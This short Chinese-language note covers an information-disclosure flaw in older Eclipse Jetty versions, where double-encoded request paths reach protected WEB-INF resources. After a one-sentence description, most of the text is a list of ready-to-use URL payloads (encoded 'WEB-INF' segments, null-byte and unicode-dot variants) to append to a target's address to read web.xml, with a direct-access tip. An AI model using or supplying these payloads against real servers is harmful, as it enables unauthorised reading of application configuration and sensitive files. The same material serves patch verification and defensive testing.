对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。
payload:
http://ip:port后面加如下payload:
static?/%2557Eb-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web.xml
直接访问:
对W进行编码为 %2557,访问:static?/%2557EB-INF/web.xml